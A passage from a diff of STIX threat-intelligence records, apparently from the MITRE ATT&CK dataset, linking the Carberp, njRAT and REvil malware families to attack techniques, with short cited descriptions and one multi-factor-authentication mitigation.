Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + }, + { + "source_name": "Trusteer Carberp October 2010", + "url": "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf", + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)", + "relationship_type": "uses", + "id": "relationship--30c0f7aa-473d-42c3-81ff-f39c6f21ee52", + "type": "relationship", + "modified": "2020-08-03T15:17:32.038Z", + "created": "2020-08-03T15:14:17.938Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions during its Man in the Browser attack to steal credentials.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--22de39b7-5d1c-4d44-b63c-36cf14a9c90d", + "type": "relationship", + "modified": "2020-08-03T15:14:17.946Z", + "created": "2020-08-03T15:14:17.946Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020." + } + ], + "description": "[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)", + "relationship_type": "uses", + "id": "relationship--63a09269-0546-4613-b746-0e1f8dac7d5b", + "type": "relationship", + "modified": "2020-08-03T15:14:17.942Z", + "created": "2020-08-03T15:14:17.942Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--2bc482f0-f5ee-433c-81bd-566ef8a8d7a6", + "type": "relationship", + "modified": "2020-08-03T19:28:18.033Z", + "created": "2020-08-03T19:28:18.033Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)\t", + "relationship_type": "uses", + "id": "relationship--b5f8197f-d703-461a-ba51-6e7749dd8367", + "type": "relationship", + "modified": "2020-10-08T18:47:57.839Z", + "created": "2020-08-03T19:28:18.045Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--8131a5ed-f95f-406d-ae56-e5e10c8ced74", + "type": "relationship", + "modified": "2020-10-08T18:47:57.831Z", + "created": "2020-08-03T19:28:18.047Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--e1bf83d4-90ce-4773-9b44-340c69e17de8", + "type": "relationship", + "modified": "2020-08-03T19:28:18.093Z", + "created": "2020-08-03T19:28:18.093Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has included a base64 encoded executable.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--72a10804-bc08-47a8-92ec-8e173b30705e", + "type": "relationship", + "modified": "2020-08-03T19:28:18.112Z", + "created": "2020-08-03T19:28:18.112Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has executed PowerShell commands via auto-run registry key persistence.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--6809f70c-63a2-415d-8c64-66784fd80caf", + "type": "relationship", + "modified": "2020-10-09T15:19:25.710Z", + "created": "2020-08-03T19:28:18.110Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) can search a list of running processes for Tr.exe.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--d46078a7-420b-4074-8ecb-3440737c12e4", + "type": "relationship", + "modified": "2020-08-03T19:28:18.115Z", + "created": "2020-08-03T19:28:18.115Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--7b17c352-f0b7-453d-9f80-e40b262ab8c7", + "type": "relationship", + "modified": "2020-08-03T19:28:18.157Z", + "created": "2020-08-03T19:28:18.157Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "relationship_type": "mitigates", + "id": "relationship--68ad793a-2678-4537-8480-8086fd4d757e", + "external_references": [ + { + "source_name": "AWS - IAM Console Best Practices", + "url": "https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/", + "description": "Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020." + } + ], + "description": "Use multi-factor authentication for cloud accounts, especially privileged accounts. This can be implemented in a variety of forms (e.g. hardware, virtual, SMS), and can also be audited using administrative reporting features.(Citation: AWS - IAM Console Best Practices)", + "type": "relationship", + "modified": "2020-10-19T16:01:22.267Z", + "created": "2020-08-04T13:26:34.212Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can decode encrypted strings to enable execution of commands and payloads.(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--a0ff37b8-1a73-45dd-a645-fe2a43fad9f6", + "type": "relationship", + "modified": "2020-10-05T15:52:55.058Z", + "created": "2020-08-04T15:35:30.353Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Group IB Ransomware May 2020", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has used encrypted strings and configuration files.(Citation: G Data Sodinokibi June 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--8b12a0c5-9e30-47ef-a786-5c5eeaf52240", + "type": "relationship", + "modified": "2020-08-05T19:35:39.714Z", + "created": "2020-08-04T15:35:30.364Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "external_references": [ + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)", + "relationship_type": "uses", + "id": "relationship--49dcbb09-c4d8-4ade-8429-94afe0b9747b", + "type": "relationship", + "modified": "2020-08-05T17:26:24.548Z", + "created": "2020-08-04T15:35:30.379Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee REvil October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has been executed via malicious MS Word e-mail attachments.(Citation: G Data Sodinokibi June 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)", + "relationship_type": "uses", + "id": "relationship--639bd473-be74-4ddb-bfc1-eaa2574df975", + "type": "relationship", + "modified": "2020-08-05T17:26:24.555Z", + "created": "2020-08-04T15:35:30.384Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--d57826cf-0fbd-44e5-9d67-9f29a93f1ca6", + "type": "relationship", + "modified": "2020-08-14T15:20:58.169Z", + "created": "2020-08-04T16:03:24.138Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Group IB Ransomware May 2020", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--598d55da-c5f9-447c-acad-0c611f1deda0", + "type": "relationship", + "modified": "2020-08-14T15:20:58.230Z", + "created": "2020-08-04T16:03:24.312Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)", + "relationship_type": "uses", + "id": "relationship--26dcd489-5bd7-4f33-a920-79535c42082c", + "type": "relationship", + "modified": "2020-08-14T15:20:58.256Z", + "created": "2020-08-04T16:03:24.318Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has the capability to destroy files and folders.(Citation: Kaspersky Sodin July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": 